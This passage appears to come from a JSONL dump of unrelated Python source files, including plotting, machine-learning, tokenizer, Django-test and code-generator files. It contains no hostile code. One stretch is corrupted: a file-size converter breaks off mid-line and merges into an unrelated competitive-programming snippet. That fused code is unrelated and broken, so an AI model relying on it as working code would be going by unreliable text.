c=colorRight((k+1)/nCells))\n elif numofplots == 1:\n ax[0].plot([0], [0], c=colorLeft(0.5))\n ax[0].set_title(k)\n for k in range (0, nCells):\n ax[0].plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax[1].plot(x_axis, listRight[k,tstart: tend], c=colorRight((k+1)/nCells))\n elif numofcols == 1:\n ax[0].plot([0], [0], c=colorLeft(0.5))\n ax[rowind].set_title(k)\n for k in range (0, nCells):\n ax[rowind].plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax[rowind].plot(x_axis, listRight[k,tstart: tend], c=colorRight((k+1)/nCells))\n rowind += 1\n else:\n colRight = 0 if onSamePlot else 1\n ax[0, 0].plot([0], [0], c=colorLeft(0.5))\n ax[rowind, 0].set_title(k)\n for k in range (0, nCells):\n ax[rowind, 0].plot(x_axis, listLeft[k,tstart: tend], c=colorLeft((k+1)/nCells)) # adding a color gradiant, darker color -> rostrally located\n ax[rowind, colRight].plot(x_axis, listRight[k,tstart: tend], c=colorRight((k+1)/nCells))\n rowind += 1\n \n plt.xlabel('Time (ms)')\n plt.xlim([timeArray[tstart], timeArray[tend] + 1])\n plt.show()\n return fig, ax\n\n#import subprocess #Required to play sound in Mac - uncomment appropriate lines in PlaySound() function\nimport winsound\n\ndef PlaySound():\n #settings for Windows\n duration = 1000 # milliseconds\n freq = 440 # Hz\n winsound.Beep(freq, duration)\n #subprocess.call(['afplay', 'Sound.wav']) #Put a wave file of your choice for the sound\n","sub_path":"Zebrafish spinal locomotor circuit/Version 2/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":14699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"110236067","text":"# Main function for classification model\n\nimport sys\nfrom main_utils import argument_parser\nfrom main_utils import load_training_set, load_dev_test_set\nfrom main_utils import show5Results, show1Result, showBestResult, showBest5Result, show5Comparison\nimport os\nfrom classification_model_L2 import classification_8layers_model\nfrom train_evaluate import train_evaluate\nimport numpy as np\nfrom utils import Params\nimport matplotlib.pyplot as plt\n\nargs = argument_parser(sys.argv)\n\nparams = Params(\"../experiments/base_model/params.json\")\n\ntrain_L, train_ab, train_bins, train_grayRGB = load_training_set(args)\ndev_L, dev_ab, dev_bins, dev_grayRGB, test_L, test_ab, test_bins, test_grayRGB = load_dev_test_set(args)\n\n# Weight directory\nmodel_dir = \"./weights_classification\"\nif not os.path.exists(model_dir):\n\tos.mkdir(model_dir)\nbest_path = os.path.join(model_dir, 'best_weights')\nlast_path = os.path.join(model_dir, 'last_weights')\n\n# Build model\ntrain_evaluate = train_evaluate(params, classification_8layers_model)\n\n# Train and predict\nif args.train:\n\tif args.restore:\n\t train_evaluate.train(train_L, train_bins, dev_L, dev_bins, model_dir, last_path)\n\telse:\n\t train_evaluate.train(train_L, train_bins, dev_L, dev_bins, model_dir)\n\nif args.predict:\n save_dir = \"/Users/apple/Desktop/CS230/Project/Report/poster/result/\"\n index = np.array([85, 86, 89, 75, 79])\n X = dev_L[index]\n Y = dev_bins[index]\n show5Comparison(train_evaluate, X, Y, dev_L[index], dev_bins[index], dev_ab[index], last_path, annealed = True, annealed_T = 0.89)\n \n plt.figure()\n index = np.array([74, 70, 65, 69, 63])\n X = dev_L[index]\n Y = dev_bins[index]\n show5Comparison(train_evaluate, X, Y, dev_L[index], dev_bins[index], dev_ab[index], last_path, annealed = True, annealed_T = 0.89, save_dir = None)\n plt.show()\n \n plt.figure()\n index = np.array([36, 20, 17, 5, 4])\n \n X = dev_L[index]\n Y = dev_bins[index]\n show5Comparison(train_evaluate, X, Y, dev_L[index], dev_bins[index], dev_ab[index], last_path, annealed = True, annealed_T = 0.89, save_dir = save_dir)\n \n plt.show()","sub_path":"model/main_classification.py","file_name":"main_classification.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465597279","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport sys, os, platform, re, subprocess\nfrom mecab import utils\nfrom mecab import runmecab\nfrom mecab.viterbi import Viterbi\nfrom mecab.writer import Writer, WordInfo\nfrom .dataloader import getDataLoader\n\nclass MecabSentenceParser:\n def __init__(self):\n self.mecab = runmecab.MecabRunner(\n '%m,%ps,%f[6],%h,%f[7] ', '\\n', '[%m,%ps] ')\n\n def tokenize(self, expr):\n exprFromMecab = self.mecab.run(expr)\n out = []\n for line in exprFromMecab:\n for node in line.split(\" \"):\n if not node:\n break\n m = re.match(\"(.+),(.+),(.+),(.*),(.*)\", node);\n if m is None:\n m = re.match(\"\\[(.+),(.+)\\]\", node)\n if m:\n #raise RuntimeError('unknown node: ' + node)\n word, startPos= m.groups(0)\n # word, startPos, dictionaryForm, partOfSpeech, kanaReading\n unicodeTextPos = int(startPos)/2\n out.append(WordInfo(word, unicodeTextPos, word, PoS.UNKNOWN, ''))\n else:\n raise RuntimeError(node)\n else:\n word, startPos, dictionaryForm, partOfSpeech, kanaReading = m.groups(0)\n unicodeTextPos = int(startPos)/2\n out.append(WordInfo(word, unicodeTextPos, dictionaryForm, int(partOfSpeech), kanaReading))\n return out\n\nclass PyPortSentenceParser(object):\n def __init__(self, dataLoader):\n self.mecab = None\n self.viterbi = Viterbi(dataLoader)\n self.writer = Writer()\n\n def tokenize(self, expr):\n path = self.viterbi.getBestPath(expr)\n return self.writer.getWordInfo(self.viterbi.getTokenizer(), path)\n","sub_path":"textproc/sentenceparser.py","file_name":"sentenceparser.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70418286","text":"# -*- coding: utf-8 -*-\n__author__ = 'dujinyuan'\n\nimport commands\nimport pprint\n\n#计数\ncount='.'\n#需要检查的路径\ncheckPathA='/rtas_log/service/'\ncheckPathB='/rtas_log/click/'\n#获取信息\nprint(\"开始扫描Alluxio!收集文件信息!\")\na = commands.getoutput('alluxio fs ls '+checkPathA)\nb = commands.getoutput('alluxio fs ls '+checkPathB)\n#封装进tuple\ntupleE = tuple(a.split(\"\\n\"))\ntupleF = tuple(b.split(\"\\n\"))\n\n'''找出所有的文件'''\nprint(\"扫描中!\"+\"文件夹: \"+checkPathA)\nfile_new = open('data/new.txt','w')\nfile_service = open('data/service_result.txt', 'w')\nfor itemE in tupleE:\n dirName = itemE.split(\" \")[-1]\n e = commands.getoutput('alluxio fs ls '+dirName)\n file_service.writelines(e+\"\\n\")\n file_new.writelines(e.split(\" \")[-1]+\"\\n\") #写入每个子文件夹下最新的那个文件\n count = count+'.'\n print(count)\nfile_service.close( )\n\nprint(\"扫描中!\"+\"文件夹: \"+checkPathB)\nfile_click = open('data/click_result.txt', 'w')\nfor itemF in tupleF:\n dirName = itemF.split(\" \")[-1]\n e = commands.getoutput('alluxio fs ls '+dirName)\n file_click.writelines(e+\"\\n\")\n file_new.writelines(e.split(\" \")[-1]+\"\\n\") #写入每个子文件夹下最新的那个文件\n count = count+'.'\n print(count)\nfile_click.close()\n\nprint(\"扫描完成!\")\n","sub_path":"alluxioClear/AlluxioDataCheck.py","file_name":"AlluxioDataCheck.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528470586","text":"SUFFIXES = ['KB', 'MB', 'GB', 'TB','PB', 'EB', 'ZB', 'YB']\n\n\ndef approximate_size(size):\n \"\"\"COnvert a file size to a human-readable form\n Keywords argument:\n size -- file size in bytes\n\n Return:string\n \"\"\"\n multiple = 1024\n for suffix in SUFFIXES:\n size /= multiple\n if size t or t % 2 != d % 2:\n ans = \"No\"\n\nprint(ans)","sub_path":"abs/abc086c.py","file_name":"abc086c.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"591531123","text":"\nimport sys, os, re, csv, codecs, numpy as np, pandas as pd\n\nimport matplotlib.pyplot as plt\n\n### matplotlib inline\n\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation\n\nfrom keras.layers import Bidirectional, GlobalMaxPool1D,Bidirectional\n\nfrom keras.models import Model\n\nfrom keras import initializers, regularizers, constraints, optimizers, layers\n\nimport matplotlib.pyplot as plt\n\n### matplotlib inline\n\nimport gensim.models.keyedvectors as word2vec\n\nimport gc\ntrain = pd.read_csv('../input/jigsaw-toxic-comment-classification-challenge/train.csv')\n\ntest = pd.read_csv('../input/jigsaw-toxic-comment-classification-challenge/test.csv')\n\nembed_size=0\nlist_classes = [\"toxic\", \"severe_toxic\", \"obscene\", \"threat\", \"insult\", \"identity_hate\"]\n\ny = train[list_classes].values\n\nlist_sentences_train = train[\"comment_text\"]\n\nlist_sentences_test = test[\"comment_text\"]\nmax_features = 20000\n\ntokenizer = Tokenizer(num_words=max_features)\n\ntokenizer.fit_on_texts(list(list_sentences_train))\n\nlist_tokenized_train = tokenizer.texts_to_sequences(list_sentences_train)\n\nlist_tokenized_test = tokenizer.texts_to_sequences(list_sentences_test)\nmaxlen = 200\n\nX_t = pad_sequences(list_tokenized_train, maxlen=maxlen)\n\nX_te = pad_sequences(list_tokenized_test, maxlen=maxlen)\ndef loadEmbeddingMatrix(typeToLoad):\n\n #load different embedding file from Kaggle depending on which embedding \n\n #matrix we are going to experiment with\n\n if(typeToLoad==\"glove\"):\n\n EMBEDDING_FILE='../input/glove-twitter/glove.twitter.27B.25d.txt'\n\n embed_size = 25\n\n elif(typeToLoad==\"word2vec\"):\n\n word2vecDict = word2vec.KeyedVectors.load_word2vec_format(\"../input/googlenewsvectorsnegative300/GoogleNews-vectors-negative300.bin\", binary=True)\n\n embed_size = 300\n\n elif(typeToLoad==\"fasttext\"):\n\n EMBEDDING_FILE='../input/fasttext/wiki.simple.vec'\n\n embed_size = 300\n\n\n\n if(typeToLoad==\"glove\" or typeToLoad==\"fasttext\" ):\n\n embeddings_index = dict()\n\n #Transfer the embedding weights into a dictionary by iterating through every line of the file.\n\n f = open(EMBEDDING_FILE)\n\n for line in f:\n\n #split up line into an indexed array\n\n values = line.split()\n\n #first index is word\n\n word = values[0]\n\n #store the rest of the values in the array as a new array\n\n coefs = np.asarray(values[1:], dtype='float32')\n\n embeddings_index[word] = coefs #50 dimensions\n\n f.close()\n\n print('Loaded %s word vectors.' % len(embeddings_index))\n\n else:\n\n embeddings_index = dict()\n\n for word in word2vecDict.wv.vocab:\n\n embeddings_index[word] = word2vecDict.word_vec(word)\n\n print('Loaded %s word vectors.' % len(embeddings_index))\n\n \n\n gc.collect()\n\n #We get the mean and standard deviation of the embedding weights so that we could maintain the \n\n #same statistics for the rest of our own random generated weights. \n\n all_embs = np.stack(list(embeddings_index.values()))\n\n emb_mean,emb_std = all_embs.mean(), all_embs.std()\n\n \n\n nb_words = len(tokenizer.word_index)\n\n #We are going to set the embedding size to the pretrained dimension as we are replicating it.\n\n #the size will be Number of Words in Vocab X Embedding Size\n\n embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))\n\n gc.collect()\n\n\n\n #With the newly created embedding matrix, we'll fill it up with the words that we have in both \n\n #our own dictionary and loaded pretrained embedding. \n\n embeddedCount = 0\n\n for word, i in tokenizer.word_index.items():\n\n i-=1\n\n #then we see if this word is in glove's dictionary, if yes, get the corresponding weights\n\n embedding_vector = embeddings_index.get(word)\n\n #and store inside the embedding matrix that we will train later on.\n\n if embedding_vector is not None: \n\n embedding_matrix[i] = embedding_vector\n\n embeddedCount+=1\n\n print('total embedded:',embeddedCount,'common words')\n\n \n\n del(embeddings_index)\n\n gc.collect()\n\n \n\n #finally, return the embedding matrix\n\n return embedding_matrix\n\nembedding_matrix = loadEmbeddingMatrix('word2vec')\nembedding_matrix.shape\ninp = Input(shape=(maxlen, )) #maxlen=200 as defined earlier\nx = Embedding(len(tokenizer.word_index), embedding_matrix.shape[1],weights=[embedding_matrix],trainable=False)(inp)\nx = Bidirectional(LSTM(60, return_sequences=True,name='lstm_layer',dropout=0.1,recurrent_dropout=0.1))(x)\nx = GlobalMaxPool1D()(x)\nx = Dropout(0.1)(x)\nx = Dense(50, activation=\"relu\")(x)\nx = Dropout(0.1)(x)\nx = Dense(6, activation=\"sigmoid\")(x)\nmodel = Model(inputs=inp, outputs=x)\n\nmodel.compile(loss='binary_crossentropy',\n\n optimizer='adam',\n\n metrics=['accuracy'])\nmodel.summary()\n#batch_size = 32\n\n#epochs = 4\n\n#hist = model.fit(X_t,y, batch_size=batch_size, epochs=epochs, validation_split=0.1)\n#loadEmbeddingMatrix('word2vec')\n#loadEmbeddingMatrix('glove') #for GLOVE or\n\n#loadEmbeddingMatrix('fasttext') #for fasttext\nall_losses = {\n\n'word2vec_loss': [0.084318213647104789,\n\n 0.057314205012433353,\n\n 0.051338302593577821,\n\n 0.047672802178572039],\n\n 'word2vec_val_loss': [0.063002561892695971,\n\n 0.057253835496480658,\n\n 0.051085027624451551,\n\n 0.049801279793734249],\n\n'glove_loss': [0.11598931579683543,\n\n 0.088738223480436862,\n\n 0.079895263566000005,\n\n 0.075343037429358703],\n\n 'glove_val_loss': [0.093467933030432285,\n\n 0.080007083813922117,\n\n 0.075349041991106688,\n\n 0.072366507668134517],\n\n 'fasttext_loss': [0.079714499498945865,\n\n 0.056074704045674786,\n\n 0.050703874653286324,\n\n 0.047420131195761134],\n\n 'fasttext_val_loss': [0.058888281775148932,\n\n 0.054906051694414926,\n\n 0.054768857866843601,\n\n 0.050697043558286421],\n\n 'baseline_loss': [0.063304489498915865,\n\n 0.044864004045674786,\n\n 0.039013874651286124,\n\n 0.038630130175761134],\n\n 'baseline_val_loss': [0.048044281075148932,\n\n 0.046414051594414926,\n\n 0.047058757860843601,\n\n 0.047886043558285421]\n\n}\n#f, ax = plt.subplots(1)\n\nepochRange = np.arange(1,5,1)\n\nplt.plot(epochRange,all_losses['word2vec_loss'])\n\nplt.plot(epochRange,all_losses['glove_loss'])\n\nplt.plot(epochRange,all_losses['fasttext_loss'])\n\nplt.plot(epochRange,all_losses['baseline_loss'])\n\nplt.title('Training loss for different embeddings')\n\nplt.ylabel('loss')\n\nplt.xlabel('epoch')\n\nplt.legend(['Word2Vec', 'GLOVE','FastText','Baseline'], loc='upper left')\n\nplt.show()\nepochRange = np.arange(1,5,1)\n\nplt.plot(epochRange,all_losses['baseline_loss'])\n\nplt.plot(epochRange,all_losses['baseline_val_loss'])\n\nplt.title('Training Vs Validation loss for baseline model')\n\nplt.ylabel('loss')\n\nplt.xlabel('epoch')\n\nplt.legend(['Training', 'Validation'], loc='upper left')\n\nplt.show()\nf, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2, sharex='col', sharey='row',figsize=(20, 20))\n\n\n\nplt.title('Training Vs Validation loss for all embeddings')\n\nax1.plot(epochRange,all_losses['baseline_loss'])\n\nax1.plot(epochRange,all_losses['baseline_val_loss'])\n\nax1.set_title('Baseline')\n\nax1.set_ylim(0.03, 0.12)\n\n\n\nax2.plot(epochRange,all_losses['word2vec_loss'])\n\nax2.plot(epochRange,all_losses['word2vec_val_loss'])\n\nax2.set_title('Word2Vec')\n\nax2.set_ylim(0.03, 0.12)\n\n\n\nax3.plot(epochRange,all_losses['glove_loss'])\n\nax3.plot(epochRange,all_losses['glove_val_loss'])\n\nax3.set_title('GLOVE')\n\nax3.set_ylim(0.03, 0.12)\n\n\n\n\n\nax4.plot(epochRange,all_losses['fasttext_loss'])\n\nax4.plot(epochRange,all_losses['fasttext_val_loss'])\n\nax4.set_title('FastText')\n\nax4.set_ylim(0.03, 0.12)\n\n\n\nplt.show()\nwordCount = {'word2vec':66078,'glove':81610,'fasttext':59613,'baseline':210337}\nind = np.arange(0,4,1) # the x locations for the groups\n\nwidth = 0.35 # the width of the bars\n\n\n\nplt.title('Number of common words used in different embeddings')\n\nembNames = list(wordCount.keys())\n\nembVals = list(wordCount.values())\n\nplt.barh(ind,embVals,align='center', height=0.5, color='m',tick_label=embNames)\n\nplt.show()","sub_path":"sources/do-pretrained-embeddings-give-you-the-extra-edge.py","file_name":"do-pretrained-embeddings-give-you-the-extra-edge.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"333789760","text":"\"\"\"\nAuthor : Yogaraja Gopal\nThis module is used to test the Infrastructure Related requests\n\"\"\"\nimport unittest\nfrom unittest import mock\nfrom django.test import Client\nfrom .mocked_get_request import mocked_requests_get\nfrom .mocked_post_request import post_mocked_requests\n\n\nclass InfrastructureTestCase(unittest.TestCase):\n \"\"\"\n This Class tests the GET infrastructure api request\n \"\"\"\n # We patch 'requests.get' with our own method. The mock object is passed in to our\n # test case method.\n @mock.patch('delivery_db.abstract.requests.get', side_effect=mocked_requests_get)\n def test_infrastructure_page(self):\n \"\"\"\n This method tests the infrastructure page view\n \"\"\"\n client = Client()\n response = client.get('/esmt/delivery_db/infrastructure/')\n self.assertEqual(response.status_code, 200)\n\n @mock.patch('delivery_db.abstract.requests.get', side_effect=mocked_requests_get)\n def test_get_infra_template(self):\n \"\"\"\n This method tests the get infra template api request\n \"\"\"\n client = Client()\n response = client.get('/api/get_infra/')\n self.assertEqual(response.status_code, 200)\n\n @mock.patch('delivery_db.abstract.requests.get', side_effect=mocked_requests_get)\n def test_add_infra_template(self):\n \"\"\"\n This method tests the add infra add view\n \"\"\"\n client = Client()\n response = client.get('/esmt/delivery_db/infra_template_add/')\n self.assertEqual(response.status_code, 200)\n\n\nclass InfraAddPOSTTestCase(unittest.TestCase):\n \"\"\"\n This Class tests the POST Infrastructure api request\n \"\"\"\n # We patch 'requests.get' with our own method. The mock object is passed in to our\n # test case method.\n\n @mock.patch('delivery_db.abstract.requests.post', side_effect=post_mocked_requests)\n def test_post_infra_add(self):\n \"\"\"\n This Class tests the Infrastructure add POST request\n \"\"\"\n client = Client()\n data = {\n \"infra_template_name\": \"Small\",\n \"host_template_description\": \"Standard_DSL1_v2\",\n \"cpu\": 1,\n \"memory_size\": 4,\n \"max_no_disk\": 3,\n \"host_type_id\": 7\n }\n\n response = client.post('/esmt/delivery_db/infra_template_add/', data,\n HTTP_X_REQUESTED_WITH='XMLHttpRequest')\n self.assertEqual(response.status_code, 200)\n","sub_path":"django/scripts/src/esmt/delivery_db/tests/tests_infrastructure.py","file_name":"tests_infrastructure.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585166455","text":"minMonthlyPayment = 0\nbalance = 3329\nannualInterestRate = 0.2\ntempBalance = balance\nwhile balance > 0:\n for i in range(12):\n unpaidBalance = balance - minMonthlyPayment\n interest = unpaidBalance * (annualInterestRate / 12)\n balance = unpaidBalance + interest\n if balance > 0:\n minMonthlyPayment += 10\n balance = tempBalance\n else:\n break\nprint(\"Lowest Payment: \" + str(round(minMonthlyPayment, 2)))","sub_path":"pythonScripts/MIT6.00.1x/unit2/calculateLowestPayment.py","file_name":"calculateLowestPayment.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"19634774","text":"cases=int(input(\"\"))\nfor m in range(0,cases):\n size=int(input(\"\"))\n results=[]\n numbers=list(map(int, input (). split ()))\n for a in range(1,size-1):\n if(numbers[a]>numbers[a-1] and numbers[a]0):\n print(results[0])\n else:\n print(\"-1\")\n results.clear()","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231247684","text":"#!/usr/bin/env python\n# Encoding: iso-8859-1\n# vim: tw=80 ts=4 sw=4 noet\n# -----------------------------------------------------------------------------\n# Project : XXX\n# -----------------------------------------------------------------------------\n# Author : Sebastien Pierre \n# License : Revised BSD License\n# -----------------------------------------------------------------------------\n# Creation : 30-May-2007\n# Last mod : 02-Jun-2007\n# -----------------------------------------------------------------------------\n\nfrom modelwriter import AbstractWriter, flatten\nfrom resolver import AbstractResolver\nimport interfaces, reporter\n\nclass Resolver(AbstractResolver):\n\tpass\n\n#------------------------------------------------------------------------------\n#\n# Java Runtime Writer\n#\n#------------------------------------------------------------------------------\n\nclass RuntimeWriter:\n\n\tdef __init__(self, writer):\n\t\tself.writer = writer\n\t\tself.write = self.writer.write\n\t\tself.p = self.prefix = \"lambdafactory\"\n\n\t#--------------------------------------------------------------------------\n\t# RENAMING\n\t#--------------------------------------------------------------------------\n\n\tdef className( self, name ):\n\t\t\"\"\"Normalizes the given name to be like a class name\"\"\"\n\t\treturn \"\".join(n[0].upper() + n[1:] for n in name.split(\"_\"))\n\n\tdef moduleName( self, name ):\n\t\t\"\"\"Normalizes the given name to be like a module name\"\"\"\n\t\treturn \"\".join(n[0].upper() + n[1:] for n in name.split(\"_\"))\n\n\t#--------------------------------------------------------------------------\n\t# RUNTIME CLASSES\n\t#--------------------------------------------------------------------------\n\n\tdef moduleClass( self ):\n\t\treturn \"%s.Class\" % (self.p)\n\n\tdef objectClass( self ):\n\t\treturn \"%s.Object\" % (self.p)\n\n\tdef valueClass( self ):\n\t\treturn \"java.lang.Object\" \n\n\tdef op( self, name ):\n\t\treturn \"%s.Runtime.%s\" % (self.prefix, name)\n\n\tdef compute( self, operator ):\n\t\tif operator == \"+\":\n\t\t\top = \"Add\"\n\t\telif operator == \"-\":\n\t\t\top = \"Substract\"\n\t\telif operator == \"/\":\n\t\t\top = \"Divide\"\n\t\telif operator == \"*\":\n\t\t\top = \"Multiply\"\n\t\telse:\n\t\t\traise Exception(\"Unsupported operator for the Java back-end: %s\" % (operator))\n\t\treturn self.op(\"compute\" + op)\n\n\t#--------------------------------------------------------------------------\n\t# RUNTIME OPERATION\n\t#--------------------------------------------------------------------------\n\n\t\n\tdef new(self, classElement):\n\t\treturn \"NEW0(%s)\" % (self.writer.getAbsoluteName(classElement)) \n\t\n\tdef newClass(self, classElement):\n\t\tparents = classElement.getParentClassesRefs()\n\t\tparent = parents and self.write(parents[0]) or \"UNDEFINED\"\n\t\treturn self.op(\"newClass(%s, %s)\" % (\n\t\t\tself.writer.getAbsoluteName(classElement),\n\t\t\tparent\n\t\t))\n\n\tdef range(self):\n\t\tpass\n\t\n\tdef superFor(self):\n\t\tpass\n\n\tdef typeFor(self, element):\n\t\tif isinstance(element, interfaces.IModule):\n\t\t\treturn \"SgModule*\"\n\t\telif isinstance(element, interfaces.IClass):\n\t\t\treturn \"SgClass*\"\n\t\telse:\n\t\t\treturn \"SgValue\"\n\n\tdef slice(self, target, slice):\n\t\treturn self.op(\"slice(%s,%s)\" % (\n\t\t\tself.write(operation.getTarget()),\n\t\t\tself.write(operation.getSlice())\n\t\t))\n\n#------------------------------------------------------------------------------\n#\n# Java Source Code Writer\n#\n#------------------------------------------------------------------------------\n\nclass Writer(AbstractWriter):\n\n\tdef __init__( self, reporter=reporter.DefaultReporter ):\n\t\tAbstractWriter.__init__(self, reporter)\n\t\tself.resolver = Resolver(reporter=reporter)\n\t\tself.inInvocation = False\n\t\tself.runtime = self.rt = RuntimeWriter(self)\n\t\tself.closureCounter = 0\n\t\tself.accumulator = []\n\t\n\tdef accumulate(self, code):\n\t\t\"\"\"Accumulates code that will be dumped and flush when the 'dump' method\n\t\tis called. This is specific to the C back-end and allows doing all kind\n\t\tof stuff in the module initialization phase\"\"\"\n\t\tself.accumulator.append(code)\n\t\n\tdef dump(self):\n\t\t\"\"\"Returns the content of the accummulator (as a list) and empties\n\t\tit.\"\"\"\n\t\tres = self.accumulator\n\t\tself.accumulator=[]\n\t\treturn res\n\n\tdef generateClosureName(self, closure):\n\t\tparent = closure.getParent()\n\t\tres = \"%s_lambda%s\" % (\n\t\t\tparent and self.getAbsoluteName(parent) or \"GLOBAL\",\n\t\t\tself.closureCounter\n\t\t)\n\t\tself.closureCounter += 1\n\t\treturn res\n\n\tdef getAbsoluteName( self, element, rename=None ):\n\t\t\"\"\"Returns the absolute name for the given element. This is the '.'\n\t\tconcatenation of the individual names of the parents.\"\"\"\n\t\tnames = [rename or element.getName()]\n\t\twhile element.getParent():\n\t\t\telement = element.getParent()\n\t\t\tif isinstance(element, interfaces.IModule):\n\t\t\t\tnames.insert(0, self.rt.moduleName(element.getName()))\n\t\t\telif isinstance(element, interfaces.IClass):\n\t\t\t\tnames.insert(0, self.rt.className(element.getName()))\n\t\t\telif not isinstance(element, interfaces.IProgram):\n\t\t\t\tnames.insert(0, element.getName())\n\t\treturn \".\".join(names)\n\n\tdef renameModuleSlot(self, name):\n\t\tif name == interfaces.Constants.ModuleInit: name = \"initialize\"\n\t\tif name == interfaces.Constants.MainFunction: name = \"main\"\n\t\treturn name\n\n\tdef writeModule( self, moduleElement, contentOnly=False ):\n\t\t\"\"\"Writes a Module element.\"\"\"\n\t\tcode = [\n\t\t]\n\t\tfor slot, value in moduleElement.getSlots():\n\t\t\tres = self.write(value)\t\n\t\t\tif type(res) in (unicode,str):\n\t\t\t\tcode.append(res)\n\t\t\telse:\n\t\t\t\tcode.extend(res)\n\t\tcode = [\n\t\t\t'public class %s extends %s {' % (\n\t\t\tself.rt.moduleName(moduleElement.getName()),self.rt.moduleClass()),\n\t\t\tcode,\n\t\t\t[\"public static void init() {\",\n\t\t\tself.dump(),\n\t\t\t\"}\"\n\t\t\t],\n\t\t\t\"}\"\n\t\t]\n\t\treturn self._format(\n\t\t\t*code\n\t\t)\n\n\tdef writeClass( self, classElement ):\n\t\t\"\"\"Writes a class element.\"\"\"\n\t\tparents = classElement.getParentClassesRefs()\n\t\tparent = self.rt.objectClass()\n\t\tclass_name = self.rt.className(classElement.getName())\n\t\tif len(parents) == 1:\n\t\t\tparent = self.write(parents[0])\n\t\t\tparent = parent[:-len(\".class\")]\n\t\telif len(parents) > 1:\n\t\t\traise Exception(\"Java back-end only supports single inheritance\")\n\t\treturn self._format(\n\t\t\t\"public static class %s extends %s {\" % (class_name, parent),\n\t\t\t\t[\tself._document(classElement),\n\t\t\t\t\t\"\\n\".join(map(self.write, flatten(\n\t\t\t\t\tclassElement.getClassAttributes(),\n\t\t\t\t\tclassElement.getAttributes(),\n\t\t\t\t\tclassElement.getConstructors(),\n\t\t\t\t\tclassElement.getDestructors(),\n\t\t\t\t\tclassElement.getClassMethods(),\n\t\t\t\t\tclassElement.getInstanceMethods()\n\t\t\t\t)))],\n\t\t\t\"}\\n\"\n\t\t)\n\n\tdef writeMethod( self, methodElement ):\n\t\t\"\"\"Writes a method element.\"\"\"\n\t\tmethod_name = methodElement.getName()\n\t\tif method_name == interfaces.Constants.Constructor: method_name = \"initialize\"\n\t\tif method_name == interfaces.Constants.Destructor: method_name = \"destroy\"\n\t\treturn self._format(\n\t\t\tself._document(methodElement),\n\t\t\t\"public %s %s(%s){\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\tmethod_name,\n\t\t\t\t\", \".join(map(self.write, methodElement.getArguments()))\n\t\t\t),\n\t\t\tself.writeFunctionWhen(methodElement),\n\t\t\tmap(self.writeStatement, methodElement.getOperations()),\n\t\t\t[self.writeImplicitReturn(methodElement)],\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeClassMethod( self, methodElement ):\n\t\t\"\"\"Writes a class method element.\"\"\"\n\t\tmethod_name = methodElement.getName()\n\t\treturn self._format(\n\t\t\tself._document(methodElement),\n\t\t\t\"public static %s %s(%s){\" % (\n\t\t\t\tself.rt.valueClass(),\n\t\t\t\tmethod_name,\n\t\t\t\t\", \".join(map(self.write, methodElement.getArguments()))\n\t\t\t),\n\t\t\tself.writeFunctionWhen(methodElement),\n\t\t\tmap(self.writeStatement, methodElement.getOperations()),\n\t\t\t[self.writeImplicitReturn(methodElement)],\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeConstructor( self, element ):\n\t\t\"\"\"Writes a method element.\"\"\"\n\t\tcurrent_class = self.getCurrentClass()\n\t\tattributes = []\n\t\tfor a in current_class.getAttributes():\n\t\t\tif not a.getDefaultValue(): continue\n\t\t\tattributes.append(\"this.%s = %s(%s);\" % (\n\t\t\t\ta.getReferenceName(),\n\t\t\t\tself.rt.op(\"box\"),\n\t\t\t\tself.write(a.getDefaultValue()))\n\t\t\t)\n\t\treturn self._format(\n\t\t\tself._document(element),\n\t\t\t\"public %s(%s){\" % (\n\t\t\t\tself.rt.className(current_class.getName()),\n\t\t\t\t\", \".join(map(self.write, element.getArguments()))\n\t\t\t),\n\t\t\tattributes or None,\n\t\t\tmap(self.writeStatement, element.getOperations()),\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeImplicitReturn( self, function ):\n\t\tif not function.endsWithTermination():\n\t\t\treturn \"return null;\"\n\t\telse:\n\t\t\treturn \"\"\n\n\tdef writeClosure( self, closure ):\n\t\t\"\"\"Writes a closure element.\"\"\"\n\t\treturn self._format(\n\t\t\t\"new org.sugarlang.runtime.Closure {\",\n\t\t\t[\n\t\t\t\t\", \".join(map(self.write, closure.getArguments()))\n\t\t\t],\n\t\t\tmap(self.writeStatement, closure.getOperations()),\n\t\t\t\"}\"\n\t\t)\n\n\tdef writeClosureBody(self, closure):\n\t\treturn self._format('{', map(writeStatement, closure.getOperations()), '}')\n\n\tdef writeFunctionWhen(self, function ):\n\t\tres = []\n\t\tfor a in function.annotations(withName=\"when\"):\n\t\t\tres.append(\"if (!(%s)) {return}\" % (self.write(a.getContent())))\n\t\treturn 